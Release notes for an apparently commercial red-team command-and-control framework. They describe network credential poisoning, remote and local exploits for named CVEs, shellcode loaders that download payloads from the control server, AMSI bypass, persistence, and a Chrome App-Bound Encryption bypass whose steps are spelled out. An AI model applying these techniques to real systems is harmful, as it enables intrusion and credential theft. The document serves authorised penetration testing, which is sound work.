Version 6.0.0: Network Poisoning, Remote Exploitation, and Native Payloads

SpecterInsight v6.0.0 ships the Inveigh network credential capture module, a new Reach remote exploitation module, browser credential extraction with Chrome App-Bound Encryption bypass, a server-side network intelligence framework, four new LevelUp privilege escalation techniques, a Zig 0.16.0 payload compiler, fourteen new payload pipelines, ten new SpecterScripts, a redesigned PowerShell notebook system with a built-in AD red team notebook, a semantic documentation search system backed by vector embeddings, an SSL C2 transport with binary wire protocol and session registration validation, and a redesigned documentation and pipeline UI. Two targeted bug fixes address PowerShell obfuscation reliability and in-memory PE execution capture.

Table of Contents

Inveigh: Network Credential Capture and Spoofing

The Inveigh credential capture framework is now a first-class SpecterInsight module. It runs entirely in-process on the implant and captures NTLMv1/NTLMv2 challenge-response hashes from multiple network protocols simultaneously. No tools are dropped to disk. Listeners and spoofers start and stop independently, and all captured credentials aggregate into an in-process store that survives individual protocol restarts.

Protocol Listeners

Start-InveighListener activates protocol-specific listeners on the target host. Supported protocols:

  • HTTP — NTLM/SPNEGO challenge-response negotiation; captures NTLMv1 and NTLMv2 hashes from browser and application authentication
  • SMB/SMB2 — full protocol implementation with packet-level parsing; captures authentication from file share access and lateral movement activity
  • LDAP — SASL/GSSAPI exchange handling; captures domain authentication triggered by LDAP queries
  • TCP and UDP listener infrastructure shared across all protocol handlers

Network Spoofers

Start-InveighSpoofer activates one or more network poisoners. Each runs independently:

  • LLMNR — Link-Local Multicast Name Resolution poisoner; responds to name resolution failures across the local segment
  • mDNS — Multicast DNS poisoner; effective against macOS and Linux hosts alongside Windows
  • NetBIOS-NS — NetBIOS Name Service poisoner; covers legacy and mixed-OS environments
  • DHCPv6 — DHCPv6 poisoner with ICMPv6 Router Advertisement and DNS Search List options; forces IPv6 WPAD and DNS through the operator’s listener on dual-stack networks
  • DNS — authoritative spoofer for controlled DNS zones

Credential Collection

  • Get-InveighCredential — returns all captured NTLMv1/NTLMv2 hashes from the in-process store
  • Wait-InveighCredential — blocks execution until at least one credential is captured; designed for use in SpecterScripts that need to pause until a hash arrives
  • Get-InveighStatus — reports which listeners and spoofers are active and their packet/capture counts
  • Stop-Inveigh — graceful shutdown of all threads; releases socket bindings
  • Clear-Inveigh — clears the credential store and resets all counters without stopping active listeners

Protocol Stack

The full NTLM and protocol negotiation stack is implemented from scratch with no external dependencies:

  • NTLMv1/NTLMv2 challenge-response with packet-level parsing and hash extraction
  • SPNEGO/GSS-API token negotiation for HTTP and LDAP authentication flows
  • ASN.1 DER encoder/decoder for GSSAPI token construction
  • Packet readers and writers for DNS, LLMNR, mDNS, NetBIOS-NS, DHCPv6, and ICMPv6

Reach: Remote Exploitation

The Reach module is a new implant-side module for remote code execution against network-adjacent targets. It exposes a unified interface over a set of CVE-based exploitation primitives, each wrapped in a standard check-and-exploit pattern so operators can survey a target before committing to an exploitation attempt.

Cmdlets

  • Get-SupportedExploits — enumerates all exploitation techniques registered in the Reach module and returns their names, CVE identifiers, and a short description of the affected surface
  • Invoke-Reach — runs a selected exploitation technique against a specified target; accepts -Technique, -Target, and technique-specific parameters; returns a result object with CheckPassed, ExploitSucceeded, and output
  • Invoke-ReachRunCommand — runs an arbitrary command on a remote target using the specified technique; convenience wrapper over Invoke-Reach for shell command delivery

Techniques

  • CVE-2022-30190 (Follina) — Microsoft Support Diagnostic Tool (MSDT) remote code execution via specially crafted Office document; exploits the ms-msdt: URI handler to execute arbitrary commands with the privileges of the user who opens the document
  • CVE-2020-0796 (SMBGhost) — SMBv3 compression buffer overflow in srv2.sys; targets Windows 10 1903/1909 and Windows Server 1903/1909 hosts that have not applied the March 2020 patch
  • CVE-2024-38063 — Windows TCP/IP remote code execution; targets the IPv6 stack in unpatched Windows hosts
  • CVE-2025-59287 (WSUS) — exploits a WSUS server accepting untrusted BinaryFormatter-serialized update metadata; delivers a TypeConfuseDelegate deserialization gadget that executes arbitrary commands on the WSUS host; requires the BinaryFormatter gadget pipelines (bf_typecfd_gadget, bf_claimsprincipal_gadget, bf_windowsidentity_gadget) to supply the serialized payload bytes

Browser Credential Extraction

A new Get-BrowserCredentials cmdlet in the Credentials module extracts saved passwords from Chromium-based browsers and Firefox. The implementation handles Chrome 127+ App-Bound Encryption (ABE), which previously blocked in-process extraction from all security contexts below the browser’s own process.

Chrome App-Bound Encryption Bypass

Chrome 127 introduced ABE, where the encryption key is protected by Google’s elevation_service.exe IElevator COM service. The service validates the calling process image path before decrypting, blocking all third-party callers. The bypass works as follows:

  • The implant locates the IElevator COM server by reading the Chrome-installed TypeLib GUID from HKLM\TypeLib; this handles all Chrome channels (Stable, Beta, Dev, Canary) and Edge
  • CoSetProxyBlanket is called with EOAC_DYNAMIC_CLOAKING on the interface proxy; this suppresses the service’s image-path verification by presenting the calling token’s identity rather than the executable path
  • The IElevator.DecryptData() vtable slot is dispatched directly to decrypt the AES-GCM key blob
  • DPAPI is applied as a first pass; IElevator handles the ABE layer; the two steps are tried in both orderings to cover Chrome versions with different key wrapping sequences
  • Stale per-IID HKLM Interface\{IID}\TypeLib registry entries left by Chrome installer updates are detected and corrected before each decryption attempt

Validated against Chrome 148.0.7778.179 with key recovery confirmed. Supports Chrome from system-level sessions by enumerating all user profiles and selecting the appropriate DPAPI scope per profile.

Supported Browsers

  • Chrome, Chrome Beta, Chrome Dev, Chrome Canary
  • Microsoft Edge (Stable, Beta, Dev)
  • Brave
  • Firefox — uses DER-based key parsing (FirefoxDerParser) to extract the NSS key database master key without requiring Firefox to be running; decrypts stored login records from the Firefox profile SQLite database

Extraction from SYSTEM Context

The cmdlet runs from SYSTEM privilege by iterating all user profile directories under C:\Users, locating each browser’s profile and login database, and scoping DPAPI operations to the target user’s entropy. No impersonation is required.

Network Intelligence

A server-side intelligence collection and augmentation framework that organizes recon data across sessions into a queryable database. As operators run port scans, process listings, interface enumerations, and credential operations, the framework parses and stores results automatically. No manual aggregation is required between sessions.

Data Collection and Augmentation

NetIntelligenceService receives task output from active sessions and runs a DataAugmentation pipeline over the raw results. Transformation stages extract structured data from unstructured output:

  • Credential extraction from credential-related task output
  • Host discovery from ping sweeps and scan output
  • Network interface enumeration parsing
  • Port scan result parsing with service banner extraction
  • Process and service list parsing

Results are cached server-side and indexed per operator. Discovered data from one session is immediately visible when working in another session against the same target environment.

Network Map

A new Network Map dock window appears in the operator workspace. The map renders discovered hosts as nodes and draws edges between hosts based on observed session activity and lateral movement paths. MAC vendor resolution runs against a 57,000-entry vendor database, annotating hardware with manufacturer information for asset fingerprinting.

Database Schema

Four new tables back the network intelligence system:

  • network_hosts — discovered hosts with IP address, hostname, OS fingerprint, and MAC address
  • network_ports — open ports and service banners keyed per host
  • network_credentials — captured credentials linked to the host they were obtained from
  • network_files — file artifacts indexed by host and originating session

Privilege Escalation: New LevelUp Techniques

Four new CVE implementations have been added to the LevelUp module, along with a new Invoke-LevelUpRunCommand cmdlet for interactive use.

CVE-2024-21447 — Windows Authentication / User Manager LPE

Exploits improper link resolution in the Windows User Manager service to achieve SYSTEM via filesystem redirection. Affects Windows 10, Windows 11, and Windows Server 2022 on systems that have not applied the April 2024 cumulative update. Implementation is 1,420 lines (CVE_2024_21447.cs). Validated on WIN-10-19043-64: CheckPassed=True, ExecuteSucceeded=True.

CVE-2023-36874 — Windows Error Reporting Service LPE

Privilege escalation via Windows Error Reporting service abuse. The technique uses a COM activation chain to achieve elevated execution through WerFault.exe. The 596-line implementation covers the full exploitation path from initial trigger to SYSTEM shell delivery.

CVE-2024-26169 — Windows Error Reporting Elevation of Privilege

Previously a partial stub, this technique has been fully implemented. NativeConstants, NativeMethods, and NativeStructs have been updated with the syscall surface required for the exploitation path.

CVE-2023-28252 — CLFS Privilege Escalation (Zig)

A native exploit targeting the Common Log File System (CLFS) driver OOB write vulnerability, implemented in Zig (CVE_2023_28252.zig, 1,299 lines). The exploit binary is compiled via the bundled Zig 0.16.0 toolchain and has no runtime dependencies. The compiled output feeds through the zig_compile payload pipeline stage.

Invoke-LevelUpRunCommand

A new Invoke-LevelUpRunCommand cmdlet provides interactive access to LevelUp techniques from the operator console and SpecterScripts. Previously, running techniques from PowerShell required calling into the technique factory directly. The cmdlet accepts a technique name and passes arguments through to the technique’s execution path.

SMB Module: EternalBlue and SmbGhost

Two remote exploitation techniques have been added to the SMB module as implant-side cmdlets, targeting unpatched Windows hosts reachable over SMB.

  • Invoke-EternalBlue — exploits CVE-2017-0144, the MS17-010 SMB buffer overflow; targets Windows 7, Windows Server 2008, and earlier hosts that never received the May 2017 security patch; executes shellcode in the context of the SMB service (SYSTEM)
  • Invoke-SmbGhost — exploits the SMBv3 compression decompression overflow; targets Windows 10 1903/1909 and Windows Server 1903/1909 hosts without the March 2020 patch; delivers shellcode to the kernel-mode SMB driver for SYSTEM execution

Zig Compiler Integration

Zig 0.16.0 is bundled as a payload compiler for generating self-contained native binaries with no runtime dependencies. Both Windows and Linux host binaries are included alongside the full Zig standard library. The compiler is used directly by the server to produce exploit binaries and custom payloads during pipeline execution.

Bundled Toolchain

  • src/Dependencies/dependencies/zig/zig.exe — Windows x64 host binary
  • src/Dependencies/dependencies/zig/zig — Linux x64 host binary
  • src/Dependencies/dependencies/zig/lib/ — full Zig standard library, identical across platforms; no separate install required

Compile-Zig Cmdlet

Compile-Zig is a PSCmdlet that accepts a string or StringTransformResult via the pipeline and returns byte[] for downstream pipeline stages.

Parameters:

  • -OSWindows or Linux
  • -Architecturex86, x86_64, or aarch64
  • -OptimizationDebug, ReleaseSafe, ReleaseFast, or ReleaseSmall
  • -OutputTypeExe or Lib

Example:

$source | Compile-Zig -OS Windows -Architecture x86_64 -Optimization ReleaseSmall

Cross-Compilation

Target triples are constructed from the -OS and -Architecture values (e.g., x86_64-windows-gnu, x86_64-linux-gnu). A Windows server can produce Linux ELF binaries and a Linux server can produce Windows PE binaries with no additional configuration.

Payload Pipelines

Fourteen new payload pipelines have been added. Six are Zig-based native loaders, three are BinaryFormatter deserialization gadgets, four expand the C# payload options, and one produces the PrintNightmare DLL.

Zig Native Loaders

  • zig_compile — compiles a Zig source program to a native EXE or shared library using the bundled Zig 0.16.0 compiler; the base stage consumed by all Zig-based pipelines
  • zig_obfuscate_and_compile — applies source-level obfuscation to Zig code (function shuffle, stack-frame jitter, runtime string encoding, comment removal, optional export renaming) before compiling; produces a native binary with no two builds sharing the same static signatures
  • zig_clr_dll_x64 — per-build obfuscated Zig-native x64 DLL; XOR-encodes the sRDI shellcode implant at compile time and decodes it at runtime before executing it in-memory from DllMain
  • zig_clr_exe_x64 — same as zig_clr_dll_x64 but produces a standalone EXE; useful when a DLL delivery primitive is unavailable
  • zig_clr_staged_dll_x64 — Zig-native x64 DLL staged loader; DllMain downloads the sRDI shellcode from the C2 at runtime over HTTPS and executes it in-memory; nothing is embedded at build time
  • zig_clr_staged_exe_x64 — same as zig_clr_staged_dll_x64 but produces a staged EXE; payload URL resolved at runtime against the configured C2 listener

PrintNightmare DLL

  • print_nightmare_dll — compiles a Windows x64 DLL via the Zig toolchain for use with PrintNightmare (CVE-2021-34527); the DLL reflectively loads the SpecterInsight implant as SYSTEM when invoked by the Print Spooler service via AddPrinterDriverEx

BinaryFormatter Deserialization Gadgets

These pipelines produce serialized .NET gadget payloads for use against deserialization sinks such as WSUS (CVE-2025-59287) and other targets that accept untrusted BinaryFormatter streams.

  • bf_typecfd_gadget — generates a TypeConfuseDelegate BinaryFormatter deserialization gadget; the inner payload is a shell command execution chain; primary gadget for WSUS exploitation via the Reach module
  • bf_claimsprincipal_gadget — generates a ClaimsPrincipal-wrapped BinaryFormatter deserialization gadget with a triple-layer deserialization chain; useful when the outermost deserializer strips or filters simple gadgets
  • bf_windowsidentity_gadget — generates a WindowsIdentity-wrapped BinaryFormatter deserialization gadget with a TypeConfuseDelegate inner payload and a double-deserialization outer layer; targets deserializers that perform type filtering on the outermost object

C# Payload Additions

  • cs_amsi_bypass_code — returns obfuscated AMSI bypass C# source code without compiling it; useful as input to a custom build pipeline or for embedding in another project
  • cs_generic_dotnet_stager — generates a C# stager that downloads a .NET executable from a specified URL and reflectively executes it in-memory; no disk writes
  • cs_load_module — compiles a C# payload that downloads and loads the implant; applies multiple obfuscation passes and embeds an AMSI bypass; output is a compiled EXE or DLL depending on configuration
  • cs_runtimeinstaller_load_module — generates an executable configured for the InstallUtil.exe LOLBin execution path; the payload runs as a custom installer action, bypassing standard execution controls

SpecterScripts

Ten new SpecterScripts have been added. Eight cover the full Inveigh credential capture workflow, and two address privilege escalation survey and exploitation.

Inveigh Scripts

  • Start Inveigh — starts all Inveigh spoofers (LLMNR, mDNS, NBNS, DNS, DHCPv6) and listeners (HTTP, SMB, LDAP) in a single call; the fastest way to stand up full network credential capture on a compromised host
  • Start Inveigh Spoofer — activates one or more name resolution spoofers with configurable target and filter lists; use this when you need spoofer-only operation without listeners
  • Start Inveigh Listener — activates one or more Inveigh protocol listeners (HTTP, SMB, LDAP) independently from the spoofers; useful when the host is already positioned to receive authentication traffic without spoofing
  • Get Inveigh Credentials — retrieves all NTLM hashes and cleartext credentials captured by the running Inveigh session; supports hashcat output format and optional deduplication
  • Wait for Inveigh Credential — blocks until Inveigh has captured a specified number of credentials or a timeout is reached; designed to be used in sequential scripts and notebooks where subsequent steps depend on obtaining a hash before proceeding
  • Stop Inveigh — stops all running Inveigh listeners and spoofers and releases all socket bindings
  • Get Inveigh Status — returns current operational status of all Inveigh listeners and spoofers including packet counts and captured credential counts
  • Clear Inveigh — resets the Inveigh session, releasing listeners and clearing the captured credential store without requiring a module reload

Privilege Escalation Scripts

  • Get Privilege Escalation Vulnerabilities — surveys the target for service misconfiguration and unquoted service path privilege escalation vulnerabilities; returns a structured list of findings with service name, binary path, and exploitability assessment
  • Exploit Privilege Escalation Vulnerabilities — runs the vulnerability survey, then sequentially exploits each finding by deploying the implant binary via the misconfigured service to create an elevated session; stops after the first successful SYSTEM session is established

PowerShell Notebooks

The PowerShell notebook system has been redesigned with a new multi-cell workspace, server-side persistent sessions, and a full suite of AI-callable management cmdlets.

Workspace

The notebook workspace provides a tabbed editor where each open notebook occupies its own tab. A sidebar lists all saved notebooks with real-time search and filter. Notebooks can be created from the sidebar, imported from a JSON file, or exported individually or in bulk. Tab state is preserved across reconnects.

Cell Types

Notebooks support three cell types that can be arranged in any order:

  • Script cells — execute PowerShell against the notebook’s server-side session; output streams (stdout, stderr, verbose, warning) are returned in real time with color coding (errors in red, warnings in amber, informational output in blue); each cell has run, cancel, clear output, and copy output controls; output visibility can be toggled to reduce visual noise after a cell has run
  • Markdown cells — render formatted documentation inline between script cells; each cell toggles between a rendered view and a raw text editor; useful for annotating phases, adding target context, and embedding external references within the notebook
  • Parameter cells — parse a PowerShell param() block and render a form-based input for each parameter; support multiple parameter sets with a set selector; generate variable declarations that get prepended to the session before script cells run; allow operators to fill in parameters without editing PowerShell syntax directly

Server-Side Sessions

Each notebook has a dedicated persistent PowerShell session on the server. State accumulated in one cell (variables, imported modules, loaded assemblies) is available to all subsequent cells without re-declaration. Sessions can be reset to a clean state via the reset command or the Specter-NotebooksResetSession cmdlet. Cell execution has a configurable timeout (default 120 seconds). Output is capped at 10,000 characters per cell to prevent runaway output from filling the workspace.

Built-in Notebook Loading

The server loads built-in notebooks from specter-notebooks.json on startup. Notebooks are identified by a fixed GUID so re-running startup does not create duplicates. The SpecterNotebooksReloadOnStartup configuration flag controls whether built-in notebooks are refreshed on each server start.

Import and Export

Notebooks are serialized to a structured JSON format containing all cells, parameter definitions, and metadata. Individual notebooks and the full notebook collection can be exported from the UI sidebar. Exported notebooks can be shared across operators and imported into any SpecterInsight instance.

Built-in Notebook: AD Red Team — Generic Windows Environment

A production-ready red team notebook covering an end-to-end Windows Active Directory engagement is included as a built-in. It is structured as eight sequential phases, each containing markdown documentation explaining the objective followed by script cells that execute against the target.

Phase 0 — Configuration defines the shared parameter set: implant build name, C2 callback URL, domain user and password, and the lateral movement target hostname. These values are declared once in a parameter cell and referenced by all subsequent phases.

Phase 1 — Infrastructure Setup creates an implant build via Specter-BuildsCreate, generates a TLS certificate via Specter-CertificatesCreate, and starts an HTTPS listener. At the end of this phase the operator has a functioning C2 ready to receive callbacks.

Phase 2 — Initial Access generates an obfuscated PowerShell one-liner via Specter-PayloadPipelineRun against the ps_command pipeline. The output is the delivery payload for the initial foothold.

Phase 3 — Foothold waits for an implant callback via Specter-SessionsWait, then collects baseline host information: system details, current user context, running processes, local group membership, and network interfaces.

Phase 4 — Privilege Escalation runs the LevelUp vulnerability survey and then sequentially attempts each discovered technique. The phase exits when a SYSTEM session is returned or all techniques are exhausted.

Phase 5 — Post-Exploitation runs from the elevated session: harvests credentials from LSASS, enumerates Active Directory computers and users, and scans the domain subnet for open ports.

Phase 6 — Domain Credential Extraction covers the full credential extraction surface: Kerberoasting, AS-REP Roasting, SAM database dumping, autologin registry extraction, Credential Manager extraction, and LLMNR/NBNS/mDNS poisoning via Inveigh to capture challenge-response hashes from other hosts on the segment.

Phase 7 — Lateral Movement deploys an implant to the configured lateral target using WMI with the harvested domain credentials and waits for the new session to call back.

Phase 8 — Persistence installs a WMI event subscription on the lateral host that re-runs the PowerShell cradle whenever system uptime exceeds a threshold, providing resilient re-entry without scheduler artifacts.

Documentation RAG Search

The server now indexes all operator-facing documentation and exposes it through a semantic search API backed by vector embeddings. Operators and AI agents can search the documentation using natural language queries rather than browsing manually.

Embedding Providers

Three embedding providers are supported and auto-selected based on the server configuration:

  • OpenAI (text-embedding-3-small, 1536-dimensional vectors) — used when an OpenAI API key is configured
  • Ollama (nomic-embed-text, 768-dimensional vectors) — used when a local Ollama instance is reachable
  • Built-in (bge-micro-v2, 384-dimensional vectors) — a local model bundled with the server; always available as a fallback with no external dependencies

Indexing and Storage

Documentation is chunked at 2,000-character boundaries and each chunk is embedded and stored in a new documentation_chunks PostgreSQL table (columns: path, title, content, embedding as real[], chunk index, indexed timestamp). The indexing pipeline is idempotent — re-indexing the same document updates the existing rows rather than creating duplicates. Indexing can be triggered via the POST /documentation/index API endpoint or the Specter-DocumentationSearch cmdlet.

Specter-DocumentationSearch Cmdlet

Specter-DocumentationSearch accepts a natural-language query string and returns the top-K most semantically relevant documentation chunks, ranked by cosine similarity against the query embedding. If no embedding provider is configured, the cmdlet falls back to substring search over the indexed content.

SSL C2 Transport

RawSslImplantServer is a new C2 listener using raw TLS rather than the HTTP/SignalR transport. It operates independently from the Kestrel HTTPS listener and can run concurrently on a separate port. CompositeImplantServer routes incoming connections to the appropriate transport based on the listener URL scheme: https:// addresses go to the Kestrel HTTP transport; ssl:// addresses go to the raw SSL transport.

Binary Wire Protocol

All communication between the implant and the raw SSL listener uses SslC2Protocol, a length-prefixed binary framing format:

  • Request frame: [1 byte command][4 bytes LE body-length][body]
  • Response frame: [1 byte status][4 bytes LE body-length][body]
  • Status codes: 0x00 = OK, 0x01 = Error
  • Response integrity is verified via an RSA-SHA256 signature frame appended after the response body

Nine command types are defined in the protocol: Register, GetTasks, PostResults, PostErrors, GetBuildSettings, GetModule, GetDownload, PostUpload, and GetPayload. These map 1:1 to the task execution loop operations already defined for the HTTP transport, so session handling, task queuing, and result delivery are identical regardless of transport.

Session Registration Validation

The DispatchRegisterAsync handler in RawSslImplantServer enforces a loopback check on registration requests. If the connecting implant presents a default (unmodified) build identity and its source IP is not a loopback address, the server rejects the registration with a generic "The requested resource could not be found." error and closes the connection. This prevents test implants running against the default build from accidentally registering into a production operator environment. Custom builds bypass the check. Registration for valid builds is delegated to ImplantHandlerService.RegisterAsync, which upserts the session record and prepares the artifact directory.

New Cmdlets

Reach Module Cmdlets (Implant-Side)

  • Get-SupportedExploits — returns a list of all exploitation techniques registered in the Reach module with their CVE identifiers and target platform descriptions
  • Invoke-Reach — runs a selected Reach exploitation technique against a remote target; -Technique selects the CVE entry; technique-specific parameters (target IP, port, payload bytes) are passed as additional arguments; returns a result object with CheckPassed and ExploitSucceeded flags
  • Invoke-ReachRunCommand — convenience cmdlet that delivers a shell command to a remote target via a Reach technique; wraps Invoke-Reach with a command execution payload

Inveigh Module Cmdlets (Implant-Side)

  • Start-InveighListener — starts one or more Inveigh protocol listeners; parameters include -Listener to select protocols (HTTP, HTTPS, Proxy, SMB, LDAP), -Challenge to set a fixed NTLM challenge value, and authentication configuration options
  • Start-InveighSpoofer — starts one or more name resolution spoofers; parameters include -Spoofer to select protocols (LLMNR, MDNS, NBNS, DNS, DHCPv6), -IP to specify the spoofed response IP, and per-protocol target and filter lists
  • Get-InveighCredential — retrieves captured NTLM challenge-response hashes and cleartext credentials; supports -Hashcat for hashcat-compatible output format and -Unique to deduplicate by username
  • Wait-InveighCredential — blocks until the specified number of credentials have been captured or the timeout expires; -Count sets the target credential count, -Timeout in seconds controls the maximum wait time
  • Get-InveighStatus — returns a status object describing all active listeners and spoofers, their bound ports, and running packet and capture counts
  • Stop-Inveigh — stops all Inveigh listeners and spoofers and releases all bound sockets; safe to call when no session is running
  • Clear-Inveigh — clears the captured credential store and resets all packet counters; does not stop active listeners

SMB Module Cmdlets (Implant-Side)

  • Invoke-EternalBlue — exploits CVE-2017-0144 against unpatched Windows 7 and Windows Server 2008 R2 targets reachable over SMB; delivers shellcode to the SMB service for SYSTEM execution
  • Invoke-SmbGhost — exploits the SMBv3 compression overflow against unpatched Windows 10 1903/1909 targets; delivers shellcode to the kernel-mode SMB driver

Credentials Module Cmdlets (Implant-Side)

  • Get-BrowserCredentials — extracts saved credentials from Chrome, Edge, Brave, and Firefox; handles Chrome 127+ App-Bound Encryption via the IElevator COM bypass; runs from SYSTEM by iterating user profiles; returns structured credential objects with URL, username, and plaintext password

LevelUp Module Cmdlet (Implant-Side)

  • Invoke-LevelUpRunCommand — runs a LevelUp privilege escalation technique by name; accepts -Technique to identify the CVE entry and -Arguments as a hashtable passed through to the technique factory; returns a result object with CheckPassed, ExecuteSucceeded, and output fields

Persistence Module Cmdlet (Implant-Side)

  • Set-IfeoHijackPersistence — installs persistence via Image File Execution Options hijack; generates a payload (PowerShell cradle, Zig EXE, Zig staged loader, or C# EXE), drops it to disk, and writes it as the IFEO debugger value for a specified target executable under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options; executes as SYSTEM whenever the target executable is launched

Recon Module Cmdlet (Implant-Side)

  • Get-RecentFiles — enumerates recently accessed files for all user profiles on the system; reads the Windows Recent Items shell folders and returns file paths, access timestamps, and associated user accounts; useful for identifying documents and credentials accessed before the implant was deployed

Server-Side PSCmdlets

  • Compile-Zig — invokes the bundled Zig 0.16.0 compiler against a Zig source string or StringTransformResult; parameters: -OS, -Architecture, -Optimization, -OutputType; returns byte[]
  • Specter-SessionsWait — blocks until a new implant session checks in; optional -IP and -Username filters narrow which session triggers the return; uses SignalR event notifications with no polling; excludes sessions that existed before the cmdlet started; returns the session object when a matching session arrives
  • Specter-AiMessagesGrep — searches the body of AI message records using regex; supports case-insensitive matching, line number output, context lines before and after each match, and invert-match; callable with a MessageId to search a single message or a SessionId to search all messages in an AI session
  • Specter-DocumentationSearch — executes a semantic search over indexed documentation using vector embeddings; accepts a natural-language query and returns the top-K most relevant chunks ranked by cosine similarity; falls back to substring search when no embedding provider is available
  • Specter-NotebooksCreate — creates a new notebook with an initial set of cells; accepts notebook name, description, and a cell array; returns the created notebook object with its assigned ID
  • Specter-NotebooksGet — retrieves a single notebook by ID; returns the notebook object including all cells and metadata
  • Specter-NotebooksList — returns all notebooks stored on the server; supports optional keyword filtering
  • Specter-NotebooksUpdate — updates a notebook’s metadata or cell array by ID; replaces the cell list in full if cells are provided
  • Specter-NotebooksDelete — deletes a notebook by ID; non-reversible
  • Specter-NotebooksRunCell — executes a single script cell from a notebook against the notebook’s persistent session; accepts the notebook ID and cell index; returns a result object with output streams, error flag, and execution duration; timeout is configurable
  • Specter-NotebooksResetSession — tears down and recreates the server-side PowerShell session for the specified notebook; clears all session state including variables, loaded modules, and runspace history

User Interface Updates

  • Documentation System — a new integrated documentation viewer lets operators browse module documentation, technique write-ups, and CVE implementation guides without leaving the application. The documentation system includes a home view, searchable index, and per-document reader (DocumentationHomeControl, DocumentationIndexControl, DocumentationControl). Documentation search invokes the server-side RAG system and surfaces ranked results inline.
  • Pipeline Quick-Run — a new quick-run panel (PayloadPipelineQuickRunControl) allows operators to execute a payload pipeline directly from the session workspace without navigating to the payload builder. Useful for rapid iteration during engagements.
  • File Explorer — FileExplorerControl renders a tree view of files collected from sessions (FileTreeNodeViewModel). Files are indexed against the network intelligence database and linked to the host they were retrieved from.
  • Event Visualization — event log entries in the session workspace are now color-coded by outcome and type. EventOutcomeColorConverter and EventTypeColorConverter map event metadata to colors. EventTypeCategoryViewModel and EventTypeSelectorViewModel support event type filtering in the log view.
  • Session Notes — SessionNotesViewModel now includes additional metadata fields for tracking engagement-specific context per session.
  • Dock Additions — CommandBuilder, FileExplorer, ScriptSearcher, and CommandHistory panels are available as dockable windows in the session workspace. Each can be docked, floating, or closed independently.

Bug Fixes

RunPE: Invoke-InMemoryPE -Capture No Longer Kills the Implant Process

Using -Capture with Invoke-InMemoryPE previously terminated the implant process. The root cause was the thread parking mechanism used to keep the loader thread alive after handing control to the loaded PE. The interim implementation used Thread.Sleep(Infinite), which is interruptible: the CLR’s Thread.Abort() and Thread.Interrupt() can wake it, and the resulting managed exception propagates into native PE frames where there is no handler, triggering an unhandled SEH fault that takes down the process.

The fix replaces Thread.Sleep with WaitForSingleObject on a static, never-signaled Win32 event (_hParkEvent). The thread enters native (preemptive) mode and becomes immune to Thread.Abort() injection and Thread.Interrupt() wakeups. The GC cannot pause it at collection boundaries either.

Additional changes shipped with this fix:

  • CRT exit hooksExitHooks now intercepts exit, _exit, _cexit, abort, and quick_exit to catch PE termination via CRT paths, preventing the CRT from tearing down the process when the loaded binary exits normally.
  • IAT-based stdout/stderr captureStdHandleHooks patches GetStdHandle in the loaded PE’s Import Address Table. The previous approach called SetStdHandle before loading the PE, which was ineffective for binaries that cache the handle at startup. IAT patching ensures the redirect is applied regardless of when the PE calls GetStdHandle.
  • RunPEContext — a ManualResetEvent (_exitEvent) tracks PE completion, replacing a polling approach for callers that wait on output.

PowerShell String Obfuscation Reliability

Three PowerShell string obfuscation transformers were producing invalid output for certain input patterns. Each had encoding or boundary errors in their output assembly logic:

  • PwshStringEscapeTransformer: off-by-one in escape sequence boundary handling
  • PwshStringReverseTransformer: encoding error when reversing strings containing multi-byte sequences
  • PwshStringShuffleTransformer: output assembly error in recombination step

All three are fixed. Regression tests for the failing input patterns have been added to the obfuscation test suite.

Scroll to Top